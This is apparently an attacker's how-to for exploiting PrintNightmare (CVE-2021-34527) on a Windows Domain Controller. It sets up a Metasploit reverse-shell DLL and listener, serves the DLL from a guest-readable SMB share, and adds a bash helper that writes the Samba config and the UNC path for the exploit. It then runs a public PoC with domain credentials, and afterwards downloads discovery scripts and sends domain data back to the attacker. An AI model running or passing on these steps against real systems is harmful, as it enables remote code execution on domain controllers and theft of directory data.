Ref: https://thedutchhacker.com/how-to-exploit-the-printnightmare-cve-2021-34527/
## Pre-exploitation
Attacker
- Install Impacket and the python script used to exploit the vulnerability.
- Install Metasploit (if you aren't using Kali), create a malicious DLL to act as the fake printer driver, and set up a listener on port 1443.
- Run the SMB server service and modify its config file so the share is reachable from the target.
- Place the fake printer driver reverse.dll (in the zipped file) in the SMB share path.
- Ensure the target exposes MS-RPRN (Print System Remote Protocol); the vulnerability can't be exploited if the protocol isn't enabled:
  rpcdump.py <username>:<password>@<target IP addr> | grep MS-RPRN
- Exploit the PrintNightmare vulnerability against the target machine. Download the python script from https://github.com/m8sec/CVE-2021-34527?tab=readme-ov-file and point -dll at the UNC path of reverse.dll on your SMB share (the spooler on the target fetches the driver over SMB, so a local path will not work):
  sudo python3 CVE-2021-34527.py -u <username> -p <password> -d <domain> -dll '\\<attacker IP addr>\<share>\reverse.dll' <target IP addr>
  Replace <username> and <password> with the login credentials of a domain user account; <target IP addr> is the Domain Controller.
- Create an uploads and extracts folder to retrieve files from the victim machine.
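As an added example (not from the original write-up or the m8sec PoC), the following bash script pulls the attacker-side preparation together: it emits the Samba share stanza that lets the DC's spooler fetch reverse.dll without credentials, builds the UNC path to pass to -dll, and checks rpcdump.py output for the MS-RPRN interface UUID rather than the friendly name the grep above relies on. The share name, share directory, script name and the two rpcdump output samples are assumptions/constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example, not part of the original write-up or the m8sec PoC:
# prepares the attacker's SMB share for the fake printer driver and checks
# rpcdump.py output for the MS-RPRN endpoint before the exploit is launched.
# Share name, share path and the two rpcdump samples below are assumptions /
# constructed for illustration.
set -eu

SHARE_NAME="${SHARE_NAME:-share}"             # assumed Samba share name
SHARE_DIR="${SHARE_DIR:-/srv/${SHARE_NAME}}"  # assumed directory backing it
DLL_NAME="${DLL_NAME:-reverse.dll}"           # the fake driver from the write-up

# MS-RPRN interface UUID. Matching on this instead of the friendly name
# "[MS-RPRN]" keeps the check independent of how a given Impacket version
# labels the interface.
RPRN_UUID='12345678-1234-ABCD-EF00-0123456789AB'

# Samba stanza for a share the spooler on the DC can read without credentials.
# The DC fetches the driver as its machine account, which Samba does not know,
# so "map to guest" in [global] plus "guest ok" on the share is what makes the
# fetch succeed. Append the output to /etc/samba/smb.conf and restart smbd.
samba_share_config() {
    cat <<EOF
[global]
   map to guest = Bad User

[${SHARE_NAME}]
   path = ${SHARE_DIR}
   browseable = yes
   read only = yes
   guest ok = yes
EOF
}

# UNC path to hand to the exploit's -dll argument, e.g. \\10.0.0.5\share\reverse.dll
dll_unc_path() {
    local attacker_ip="$1"
    printf '%s\n' "\\\\${attacker_ip}\\${SHARE_NAME}\\${DLL_NAME}"
}

# Reads rpcdump.py output on stdin; exit 0 if the Print System Remote Protocol
# interface is registered on the target (spooler running), 1 otherwise.
rprn_exposed() {
    grep -qiF "$RPRN_UUID"
}

# Constructed sample: what rpcdump.py prints for a DC with the spooler running.
SAMPLE_RPCDUMP_VULN='Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
          ncacn_ip_tcp:10.10.10.10[49671]
          ncacn_np:\\DC01[\pipe\spoolss]'

# Constructed sample: spooler stopped, only an unrelated interface (SAMR) left.
SAMPLE_RPCDUMP_NO_SPOOLER='Protocol: [MS-SAMR]: Security Account Manager (SAM) Remote Protocol
Provider: samsrv.dll
UUID    : 12345778-1234-ABCD-EF00-0123456789AC v1.0
Bindings:
          ncacn_np:\\DC01[\pipe\lsass]'

# Live use: ./prep.sh '<domain>/<user>:<pass>@<target IP>' <attacker IP>
# Without arguments the script only defines the helpers above.
if [ $# -ge 2 ] && command -v rpcdump.py >/dev/null 2>&1; then
    dump=$(rpcdump.py "$1")
    if printf '%s\n' "$dump" | rprn_exposed; then
        echo "[+] MS-RPRN exposed on target; use -dll $(dll_unc_path "$2")"
        samba_share_config
    else
        echo "[-] MS-RPRN not registered; start the Spooler service on the target first"
        exit 1
    fi
fi
```

Run it as `./prep.sh '<domain>/<user>:<pass>@<DC IP>' <attacker IP>` (the prep.sh name is assumed). A hit on the UUID tells you the spooler is reachable; it does not by itself prove the patch state of the target, so the exploit attempt remains the real test.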
Target machine
- Ensure the Domain Controller is running the Print Spooler service (the exploit needs it) by checking the service and starting it if it is stopped:
  PS C:\Users\Administrator> Get-Service Spooler
  PS C:\Users\Administrator> Start-Service Spooler
## Post-exploitation
Download the 2 scripts to discover the victim DC machine and domain group info, then send the results back to the attacker listener.
PS Invoke-WebRequest -Uri path/to/discovery.bat -OutFile discovery.bat
PS Invoke-WebRequest -Uri path/to/export.bat -OutFile export.bat